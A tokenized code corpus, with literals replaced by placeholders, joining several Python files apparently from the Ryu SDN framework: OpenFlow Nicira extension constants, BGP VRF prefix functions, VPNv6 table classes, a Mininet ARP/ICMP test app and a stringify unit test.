<NUM_LIT> <EOL> NXAST_NAT = <NUM_LIT> <EOL> NX_ACTION_RESUBMIT_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_RESUBMIT_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_RESUBMIT_PACK_STR ) == NX_ACTION_RESUBMIT_SIZE <EOL> NX_ACTION_SET_TUNNEL_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_TUNNEL_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_SET_TUNNEL_PACK_STR ) == NX_ACTION_SET_TUNNEL_SIZE <EOL> NX_ACTION_SET_QUEUE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_QUEUE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_SET_QUEUE_PACK_STR ) == NX_ACTION_SET_QUEUE_SIZE <EOL> NX_ACTION_POP_QUEUE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_POP_QUEUE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_POP_QUEUE_PACK_STR ) == NX_ACTION_POP_QUEUE_SIZE <EOL> NX_ACTION_REG_MOVE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_REG_MOVE_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_REG_MOVE_PACK_STR ) == NX_ACTION_REG_MOVE_SIZE <EOL> NX_ACTION_REG_LOAD_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_REG_LOAD_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_REG_LOAD_PACK_STR ) == NX_ACTION_REG_LOAD_SIZE <EOL> NX_ACTION_SET_TUNNEL64_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_TUNNEL64_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_SET_TUNNEL64_PACK_STR ) == NX_ACTION_SET_TUNNEL64_SIZE <EOL> NX_ACTION_MULTIPATH_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_MULTIPATH_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_MULTIPATH_PACK_STR ) == NX_ACTION_MULTIPATH_SIZE <EOL> NX_ACTION_NOTE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_NOTE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_NOTE_PACK_STR ) == NX_ACTION_NOTE_SIZE <EOL> NX_ACTION_BUNDLE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_BUNDLE_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_BUNDLE_PACK_STR ) == NX_ACTION_BUNDLE_SIZE <EOL> NX_ACTION_AUTOPATH_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_AUTOPATH_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_AUTOPATH_PACK_STR ) == NX_ACTION_AUTOPATH_SIZE <EOL> NX_ACTION_OUTPUT_REG_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_OUTPUT_REG_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_OUTPUT_REG_PACK_STR ) == NX_ACTION_OUTPUT_REG_SIZE <EOL> NX_ACTION_LEARN_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_LEARN_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_LEARN_PACK_STR ) == NX_ACTION_LEARN_SIZE <EOL> NX_ACTION_CONTROLLER_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_CONTROLLER_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_CONTROLLER_PACK_STR ) == NX_ACTION_CONTROLLER_SIZE <EOL> NX_ACTION_FIN_TIMEOUT_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_FIN_TIMEOUT_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_FIN_TIMEOUT_PACK_STR ) == NX_ACTION_FIN_TIMEOUT_SIZE <EOL> NX_ACTION_HEADER_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_HEADER_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_HEADER_PACK_STR ) == NX_ACTION_HEADER_SIZE <EOL> NXT_ROLE_REQUEST = <NUM_LIT:10> <EOL> NXT_ROLE_REPLY = <NUM_LIT:11> <EOL> NXT_SET_FLOW_FORMAT = <NUM_LIT:12> <EOL> NXT_FLOW_MOD = <NUM_LIT> <EOL> NXT_FLOW_REMOVED = <NUM_LIT> <EOL> NXT_FLOW_MOD_TABLE_ID = <NUM_LIT:15> <EOL> NXT_SET_PACKET_IN_FORMAT = <NUM_LIT:16> <EOL> NXT_PACKET_IN = <NUM_LIT> <EOL> NXT_FLOW_AGE = <NUM_LIT> <EOL> NXT_SET_ASYNC_CONFIG = <NUM_LIT> <EOL> NXT_SET_CONTROLLER_ID = <NUM_LIT:20> <EOL> NX_ROLE_OTHER = <NUM_LIT:0> <EOL> NX_ROLE_MASTER = <NUM_LIT:1> <EOL> NX_ROLE_SLAVE = <NUM_LIT:2> <EOL> NXFF_OPENFLOW10 = <NUM_LIT:0> <EOL> NXFF_NXM = <NUM_LIT:2> <EOL> NXPIF_OPENFLOW10 = <NUM_LIT:0> <EOL> NXPIF_NXM = <NUM_LIT:1> <EOL> NXST_FLOW = <NUM_LIT:0> <EOL> NXST_AGGREGATE = <NUM_LIT:1> <EOL> NXST_FLOW_MONITOR = <NUM_LIT:2> <EOL> NICIRA_HEADER_PACK_STR = '<STR_LIT>' <EOL> NICIRA_HEADER_SIZE = <NUM_LIT:16> <EOL> assert ( calcsize ( NICIRA_HEADER_PACK_STR ) + <EOL> OFP_HEADER_SIZE == NICIRA_HEADER_SIZE ) <EOL> NX_ROLE_PACK_STR = '<STR_LIT>' <EOL> NX_ROLE_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_ROLE_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_ROLE_SIZE ) <EOL> NX_FLOW_MOD_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_MOD_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_MOD_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_MOD_SIZE ) <EOL> NX_SET_FLOW_FORMAT_PACK_STR = '<STR_LIT>' <EOL> NX_SET_FLOW_FORMAT_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_SET_FLOW_FORMAT_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_SET_FLOW_FORMAT_SIZE ) <EOL> NX_FLOW_REMOVED_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_REMOVED_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_REMOVED_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_REMOVED_SIZE ) <EOL> NX_FLOW_MOD_TABLE_ID_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_MOD_TABLE_ID_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_MOD_TABLE_ID_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_MOD_TABLE_ID_SIZE ) <EOL> NX_SET_PACKET_IN_FORMAT_PACK_STR = '<STR_LIT>' <EOL> NX_SET_PACKET_IN_FORMAT_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_SET_PACKET_IN_FORMAT_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_SET_PACKET_IN_FORMAT_SIZE ) <EOL> NX_PACKET_IN_PACK_STR = '<STR_LIT>' <EOL> NX_PACKET_IN_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_PACKET_IN_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_PACKET_IN_SIZE ) <EOL> NX_ASYNC_CONFIG_PACK_STR = '<STR_LIT>' <EOL> NX_ASYNC_CONFIG_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_ASYNC_CONFIG_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_ASYNC_CONFIG_SIZE ) <EOL> NX_CONTROLLER_ID_PACK_STR = '<STR_LIT>' <EOL> NX_CONTROLLER_ID_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_CONTROLLER_ID_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_CONTROLLER_ID_SIZE ) <EOL> NX_STATS_MSG_PACK_STR = '<STR_LIT>' <EOL> NX_STATS_MSG0_SIZE = <NUM_LIT:8> <EOL> assert calcsize ( NX_STATS_MSG_PACK_STR ) == NX_STATS_MSG0_SIZE <EOL> NX_STATS_MSG_SIZE = <NUM_LIT> <EOL> _OFP_VENDOR_STATS_MSG_SIZE = <NUM_LIT:16> <EOL> assert ( calcsize ( NX_STATS_MSG_PACK_STR ) + _OFP_VENDOR_STATS_MSG_SIZE == <EOL> NX_STATS_MSG_SIZE ) <EOL> NX_FLOW_STATS_REQUEST_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_STATS_REQUEST_SIZE = <NUM_LIT:8> <EOL> assert ( calcsize ( NX_FLOW_STATS_REQUEST_PACK_STR ) == <EOL> NX_FLOW_STATS_REQUEST_SIZE ) <EOL> NX_FLOW_STATS_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_STATS_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_FLOW_STATS_PACK_STR ) == NX_FLOW_STATS_SIZE <EOL> NX_AGGREGATE_STATS_REQUEST_PACK_STR = '<STR_LIT>' <EOL> NX_AGGREGATE_STATS_REQUEST_SIZE = <NUM_LIT:8> <EOL> assert ( calcsize ( NX_AGGREGATE_STATS_REQUEST_PACK_STR ) == <EOL> NX_AGGREGATE_STATS_REQUEST_SIZE ) <EOL> NX_AGGREGATE_STATS_REPLY_PACK_STR = '<STR_LIT>' <EOL> NX_AGGREGATE_STATS_REPLY_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_AGGREGATE_STATS_REPLY_PACK_STR ) == <EOL> NX_AGGREGATE_STATS_REPLY_SIZE ) <EOL> NX_HASH_FIELDS_ETH_SRC = <NUM_LIT:0> <EOL> NX_HASH_FIELDS_SYMMETRIC_L4 = <NUM_LIT:1> <EOL> NX_MP_ALG_MODULO_N = <NUM_LIT:0> <EOL> NX_MP_ALG_HASH_THRESHOLD = <NUM_LIT:1> <EOL> NX_MP_ALG_HRW = <NUM_LIT:2> <EOL> NX_MP_ALG_ITER_HASH = <NUM_LIT:3> <EOL> NX_BD_ALG_ACTIVE_BACKUP = <NUM_LIT:0> <EOL> NX_BD_ALG_HRW = <NUM_LIT:1> <EOL> NX_LEARN_N_BITS_MASK = <NUM_LIT> <EOL> NX_LEARN_SRC_FIELD = <NUM_LIT:0> << <NUM_LIT> <EOL> NX_LEARN_SRC_IMMEDIATE = <NUM_LIT:1> << <NUM_LIT> <EOL> NX_LEARN_SRC_MASK = <NUM_LIT:1> << <NUM_LIT> <EOL> NX_LEARN_DST_MATCH = <NUM_LIT:0> << <NUM_LIT:11> <EOL> NX_LEARN_DST_LOAD = <NUM_LIT:1> << <NUM_LIT:11> <EOL> NX_LEARN_DST_OUTPUT = <NUM_LIT:2> << <NUM_LIT:11> <EOL> NX_LEARN_DST_RESERVED = <NUM_LIT:3> << <NUM_LIT:11> <EOL> NX_LEARN_DST_MASK = <NUM_LIT:3> << <NUM_LIT:11> <EOL> NX_NAT_RANGE_IPV4_MIN = <NUM_LIT:1> << <NUM_LIT:0> <EOL> NX_NAT_RANGE_IPV4_MAX = <NUM_LIT:1> << <NUM_LIT:1> <EOL> NX_NAT_RANGE_IPV6_MIN = <NUM_LIT:1> << <NUM_LIT:2> <EOL> NX_NAT_RANGE_IPV6_MAX = <NUM_LIT:1> << <NUM_LIT:3> <EOL> NX_NAT_RANGE_PROTO_MIN = <NUM_LIT:1> << <NUM_LIT:4> <EOL> NX_NAT_RANGE_PROTO_MAX = <NUM_LIT:1> << <NUM_LIT:5> </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from ryu . services . protocols . bgp . api . base import NEXT_HOP <EOL> from ryu . services . protocols . bgp . api . base import PREFIX <EOL> from ryu . services . protocols . bgp . api . base import RegisterWithArgChecks <EOL> from ryu . services . protocols . bgp . api . base import ROUTE_DISTINGUISHER <EOL> from ryu . services . protocols . bgp . api . base import VPN_LABEL <EOL> from ryu . services . protocols . bgp . base import add_bgp_error_metadata <EOL> from ryu . services . protocols . bgp . base import PREFIX_ERROR_CODE <EOL> from ryu . services . protocols . bgp . base import validate <EOL> from ryu . services . protocols . bgp . core import BgpCoreError <EOL> from ryu . services . protocols . bgp . core_manager import CORE_MANAGER <EOL> from ryu . services . protocols . bgp . rtconf . base import RuntimeConfigError <EOL> from ryu . services . protocols . bgp . rtconf . vrfs import VRF_RF <EOL> from ryu . services . protocols . bgp . rtconf . vrfs import VRF_RF_IPV4 <EOL> from ryu . services . protocols . bgp . utils import validation <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> @ add_bgp_error_metadata ( code = PREFIX_ERROR_CODE , <EOL> sub_code = <NUM_LIT:1> , <EOL> def_desc = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class PrefixError ( RuntimeConfigError ) : <EOL> pass <EOL> @ validate ( name = PREFIX ) <EOL> def is_valid_prefix ( ipv4_prefix ) : <EOL> return validation . is_valid_ipv4_prefix ( ipv4_prefix ) <EOL> @ validate ( name = NEXT_HOP ) <EOL> def is_valid_next_hop ( next_hop_addr ) : <EOL> return validation . is_valid_ipv4 ( next_hop_addr ) <EOL> @ RegisterWithArgChecks ( name = '<STR_LIT>' , <EOL> req_args = [ ROUTE_DISTINGUISHER , PREFIX , NEXT_HOP ] , <EOL> opt_args = [ VRF_RF ] ) <EOL> def add_local ( route_dist , prefix , next_hop , route_family = VRF_RF_IPV4 ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tm = CORE_MANAGER . get_core_service ( ) . table_manager <EOL> label = tm . add_to_vrf ( route_dist , prefix , next_hop , route_family ) <EOL> if label : <EOL> label = label [ <NUM_LIT:0> ] <EOL> return [ { ROUTE_DISTINGUISHER : route_dist , PREFIX : prefix , <EOL> VRF_RF : route_family , VPN_LABEL : label } ] <EOL> except BgpCoreError as e : <EOL> raise PrefixError ( desc = e ) <EOL> @ RegisterWithArgChecks ( name = '<STR_LIT>' , <EOL> req_args = [ ROUTE_DISTINGUISHER , PREFIX ] , <EOL> opt_args = [ VRF_RF ] ) <EOL> def delete_local ( route_dist , prefix , route_family = VRF_RF_IPV4 ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tm = CORE_MANAGER . get_core_service ( ) . table_manager <EOL> tm . remove_from_vrf ( route_dist , prefix , route_family ) <EOL> return [ { ROUTE_DISTINGUISHER : route_dist , PREFIX : prefix , <EOL> VRF_RF : route_family } ] <EOL> except BgpCoreError as e : <EOL> raise PrefixError ( desc = e ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from ryu . lib . packet . bgp import IP6AddrPrefix <EOL> from ryu . lib . packet . bgp import RF_IPv6_VPN <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnDest <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnPath <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnTable <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class Vpnv6Dest ( VpnDest ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> class Vpnv6Table ( VpnTable ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> VPN_DEST_CLASS = Vpnv6Dest <EOL> class Vpnv6Path ( VpnPath ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> VRF_PATH_CLASS = None <EOL> NLRI_CLASS = IP6AddrPrefix <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( Vpnv6Path , self ) . __init__ ( * args , ** kwargs ) <EOL> from ryu . services . protocols . bgp . info_base . vrf6 import Vrf6Path <EOL> self . VRF_PATH_CLASS = Vrf6Path </s>
<s> import importlib <EOL> import inspect <EOL> import six <EOL> class Field ( object ) : <EOL> def __init__ ( self , field_name ) : <EOL> self . field_name = field_name <EOL> def get ( self , obj ) : <EOL> return getattr ( obj , self . field_name ) <EOL> class RelatedViewField ( Field ) : <EOL> def __init__ ( self , field_name , operator_view_class ) : <EOL> super ( RelatedViewField , self ) . __init__ ( field_name ) <EOL> self . __operator_view_class = operator_view_class <EOL> @ property <EOL> def _operator_view_class ( self ) : <EOL> if inspect . isclass ( self . __operator_view_class ) : <EOL> return self . __operator_view_class <EOL> elif isinstance ( self . __operator_view_class , six . string_types ) : <EOL> try : <EOL> module_name , class_name = self . __operator_view_class . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> return class_for_name ( module_name , class_name ) <EOL> except ( AttributeError , ValueError , ImportError ) : <EOL> raise WrongOperatorViewClassError ( <EOL> '<STR_LIT>' % self . __operator_view_class <EOL> ) <EOL> def retrieve_and_wrap ( self , obj ) : <EOL> related_obj = self . get ( obj ) <EOL> return self . wrap ( related_obj ) <EOL> def wrap ( self , obj ) : <EOL> return self . _operator_view_class ( obj ) <EOL> class RelatedListViewField ( RelatedViewField ) : <EOL> pass <EOL> class RelatedDictViewField ( RelatedViewField ) : <EOL> pass <EOL> class DataField ( Field ) : <EOL> pass <EOL> class OptionalDataField ( DataField ) : <EOL> def get ( self , obj ) : <EOL> if hasattr ( obj , self . field_name ) : <EOL> return getattr ( obj , self . field_name ) <EOL> else : <EOL> return None <EOL> class WrongOperatorViewClassError ( Exception ) : <EOL> pass <EOL> def class_for_name ( module_name , class_name ) : <EOL> m = importlib . import_module ( module_name ) <EOL> c = getattr ( m , class_name ) <EOL> return c </s>
<s> import uuid <EOL> class _UUIDDict ( dict ) : <EOL> def _uuidize ( self ) : <EOL> if '<STR_LIT>' not in self or self [ '<STR_LIT>' ] is None : <EOL> self [ '<STR_LIT>' ] = uuid . uuid4 ( ) <EOL> @ property <EOL> def uuid ( self ) : <EOL> self . _uuidize ( ) <EOL> return self [ '<STR_LIT>' ] <EOL> @ uuid . setter <EOL> def uuid ( self , value ) : <EOL> self [ '<STR_LIT>' ] = value <EOL> class Row ( _UUIDDict ) : <EOL> @ property <EOL> def delete ( self ) : <EOL> if '<STR_LIT>' in self and self [ '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ delete . setter <EOL> def delete ( self , value ) : <EOL> self [ '<STR_LIT>' ] = value </s>
<s> import logging <EOL> import array <EOL> import netaddr <EOL> from ryu . base import app_manager <EOL> from ryu . controller import dpset <EOL> from ryu . controller import ofp_event <EOL> from ryu . controller import handler <EOL> from ryu . ofproto import ofproto_v1_2 <EOL> from ryu . ofproto import ether <EOL> from ryu . ofproto import inet <EOL> from ryu . lib import mac <EOL> from ryu . lib . packet import packet <EOL> from ryu . lib . packet import ethernet <EOL> from ryu . lib . packet import arp <EOL> from ryu . lib . packet import ipv4 <EOL> from ryu . lib . packet import icmp <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class RunTestMininet ( app_manager . RyuApp ) : <EOL> _CONTEXTS = { '<STR_LIT>' : dpset . DPSet } <EOL> OFP_VERSIONS = [ ofproto_v1_2 . OFP_VERSION ] <EOL> ZERO_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> BROADCAST_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> RYU_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> HOST_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> RYU_IP = int ( netaddr . IPAddress ( '<STR_LIT>' ) ) <EOL> HOST_IP = int ( netaddr . IPAddress ( '<STR_LIT>' ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( RunTestMininet , self ) . __init__ ( * args , ** kwargs ) <EOL> def _send_msg ( self , dp , data ) : <EOL> buffer_id = <NUM_LIT> <EOL> in_port = dp . ofproto . OFPP_LOCAL <EOL> actions = [ dp . ofproto_parser . OFPActionOutput ( <NUM_LIT:1> , <NUM_LIT:0> ) ] <EOL> msg = dp . ofproto_parser . OFPPacketOut ( <EOL> dp , buffer_id , in_port , actions , data ) <EOL> dp . send_msg ( msg ) <EOL> def _add_flow ( self , dp , match , actions ) : <EOL> inst = [ dp . ofproto_parser . OFPInstructionActions ( <EOL> dp . ofproto . OFPIT_APPLY_ACTIONS , actions ) ] <EOL> mod = dp . ofproto_parser . OFPFlowMod ( <EOL> dp , cookie = <NUM_LIT:0> , cookie_mask = <NUM_LIT:0> , table_id = <NUM_LIT:0> , <EOL> command = dp . ofproto . OFPFC_ADD , idle_timeout = <NUM_LIT:0> , hard_timeout = <NUM_LIT:0> , <EOL> priority = <NUM_LIT> , buffer_id = <NUM_LIT> , <EOL> out_port = dp . ofproto . OFPP_ANY , out_group = dp . ofproto . OFPG_ANY , <EOL> flags = <NUM_LIT:0> , match = match , instructions = inst ) <EOL> dp . send_msg ( mod ) <EOL> def _find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def _get_protocols ( self , pkt ) : <EOL> protocols = { } <EOL> for p in pkt : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> protocols [ p . protocol_name ] = p <EOL> else : <EOL> protocols [ '<STR_LIT>' ] = p <EOL> return protocols <EOL> def _build_ether ( self , ethertype , dst_mac = HOST_MAC ) : <EOL> e = ethernet . ethernet ( dst_mac , self . RYU_MAC , ethertype ) <EOL> return e <EOL> def _build_arp ( self , opcode , dst_ip = HOST_IP ) : <EOL> if opcode == arp . ARP_REQUEST : <EOL> _eth_dst_mac = self . BROADCAST_MAC <EOL> _arp_dst_mac = self . ZERO_MAC <EOL> elif opcode == arp . ARP_REPLY : <EOL> _eth_dst_mac = self . HOST_MAC <EOL> _arp_dst_mac = self . HOST_MAC <EOL> e = self . _build_ether ( ether . ETH_TYPE_ARP , _eth_dst_mac ) <EOL> a = arp . arp ( hwtype = <NUM_LIT:1> , proto = ether . ETH_TYPE_IP , hlen = <NUM_LIT:6> , plen = <NUM_LIT:4> , <EOL> opcode = opcode , src_mac = self . RYU_MAC , src_ip = self . RYU_IP , <EOL> dst_mac = _arp_dst_mac , dst_ip = dst_ip ) <EOL> p = packet . Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( a ) <EOL> p . serialize ( ) <EOL> return p <EOL> def _build_echo ( self , _type , echo ) : <EOL> e = self . _build_ether ( ether . ETH_TYPE_IP ) <EOL> ip = ipv4 . ipv4 ( version = <NUM_LIT:4> , header_length = <NUM_LIT:5> , tos = <NUM_LIT:0> , total_length = <NUM_LIT> , <EOL> identification = <NUM_LIT:0> , flags = <NUM_LIT:0> , offset = <NUM_LIT:0> , ttl = <NUM_LIT:64> , <EOL> proto = inet . IPPROTO_ICMP , csum = <NUM_LIT:0> , <EOL> src = self . RYU_IP , dst = self . HOST_IP ) <EOL> ping = icmp . icmp ( _type , code = <NUM_LIT:0> , csum = <NUM_LIT:0> , data = echo ) <EOL> p = packet . Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( ip ) <EOL> p . add_protocol ( ping ) <EOL> p . serialize ( ) <EOL> return p <EOL> def _garp ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REQUEST , self . RYU_IP ) <EOL> return p . data <EOL> def _arp_request ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REQUEST , self . HOST_IP ) <EOL> return p . data <EOL> def _arp_reply ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REPLY , self . HOST_IP ) <EOL> return p . data <EOL> def _echo_request ( self , echo ) : <EOL> p = self . _build_echo ( icmp . ICMP_ECHO_REQUEST , echo ) <EOL> return p . data <EOL> def _echo_reply ( self , echo ) : <EOL> p = self . _build_echo ( icmp . ICMP_ECHO_REPLY , echo ) <EOL> return p . data <EOL> @ handler . set_ev_cls ( ofp_event . EventOFPPacketIn , handler . MAIN_DISPATCHER ) <EOL> def packet_in_handler ( self , ev ) : <EOL> msg = ev . msg <EOL> dp = msg . datapath <EOL> pkt = packet . Packet ( array . array ( '<STR_LIT:B>' , msg . data ) ) <EOL> p_arp = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> p_icmp = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> p_ipv4 = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> if p_arp : <EOL> src_ip = str ( netaddr . IPAddress ( p_arp . src_ip ) ) <EOL> dst_ip = str ( netaddr . IPAddress ( p_arp . dst_ip ) ) <EOL> if p_arp . opcode == arp . ARP_REQUEST : <EOL> LOG . debug ( "<STR_LIT>" , src_ip , dst_ip ) <EOL> if p_arp . dst_ip == self . RYU_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _arp_reply ( ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_arp . dst_ip == self . HOST_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _arp_request ( ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_arp . opcode == arp . ARP_REPLY : <EOL> LOG . debug ( "<STR_LIT>" , src_ip , dst_ip ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> echo = icmp . echo ( id_ = <NUM_LIT> , seq = <NUM_LIT:1> ) <EOL> data = self . _echo_request ( echo ) <EOL> self . _send_msg ( dp , data ) <EOL> if p_icmp : <EOL> src = str ( netaddr . IPAddress ( p_ipv4 . src ) ) <EOL> dst = str ( netaddr . IPAddress ( p_ipv4 . dst ) ) <EOL> if p_icmp . type == icmp . ICMP_ECHO_REQUEST : <EOL> LOG . debug ( "<STR_LIT>" , src , dst ) <EOL> if p_ipv4 . dst == self . RYU_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> echo = p_icmp . data <EOL> echo . data = bytearray ( echo . data ) <EOL> data = self . _echo_reply ( echo ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_icmp . type == icmp . ICMP_ECHO_REPLY : <EOL> LOG . debug ( "<STR_LIT>" , src , dst ) <EOL> @ handler . set_ev_cls ( dpset . EventDP , dpset . DPSET_EV_DISPATCHER ) <EOL> def handler_datapath ( self , ev ) : <EOL> if ev . enter : <EOL> dp = ev . dp <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _garp ( ) <EOL> self . _send_msg ( dp , data ) </s>
<s> from __future__ import print_function <EOL> import base64 <EOL> import six <EOL> import unittest <EOL> from nose . tools import eq_ <EOL> from ryu . lib import stringify <EOL> class C1 ( stringify . StringifyMixin ) : <EOL> def __init__ ( self , a , c ) : <EOL> print ( "<STR_LIT>" % ( a , c ) ) <EOL> self . a = a <EOL> self . _b = '<STR_LIT:B>' <EOL> self . c = c <EOL> class Test_stringify ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_jsondict ( self ) : <EOL> if six . PY3 : <EOL> def b64encode ( s ) : <EOL> return base64 . b64encode ( s ) . decode ( '<STR_LIT:ascii>' ) <EOL> else : <EOL> b64encode = base64 . b64encode <EOL> j = { '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } } <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:a>' ] , b64encode ( b'<STR_LIT>' ) ) <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:c>' ] , b64encode ( b'<STR_LIT>' ) ) <EOL> c = C1 ( a = b'<STR_LIT>' , c = b'<STR_LIT>' ) <EOL> c2 = C1 . from_jsondict ( j [ '<STR_LIT>' ] ) <EOL> eq_ ( c . __class__ , c2 . __class__ ) <EOL> eq_ ( c . __dict__ , c2 . __dict__ ) <EOL> eq_ ( j , c . to_jsondict ( ) ) <EOL> def test_jsondict2 ( self ) : <EOL> def my_encode ( x ) : <EOL> return x . lower ( ) <EOL> def my_decode ( x ) : <EOL> return x . upper ( ) <EOL> j = { '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } } <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:a>' ] , my_encode ( '<STR_LIT>' ) ) <EOL> eq_ ( j [ '<STR_LIT>' ] [ '<STR_LIT:c>' ] , my_encode ( '<STR_LIT>' ) ) <EOL> c = C1 ( a = '<STR_LIT>' , c = '<STR_LIT>' ) <EOL> c2 = C1 . from_jsondict ( j [ '<STR_LIT>' ] , decode_string = my_decode ) <EOL> eq_ ( c . __class__ , c2 . __class__ ) <EOL> eq_ ( c . __dict__ , c2 . __dict__ ) <EOL> eq_ ( j , c . to_jsondict ( encode_string = my_encode ) ) </s>
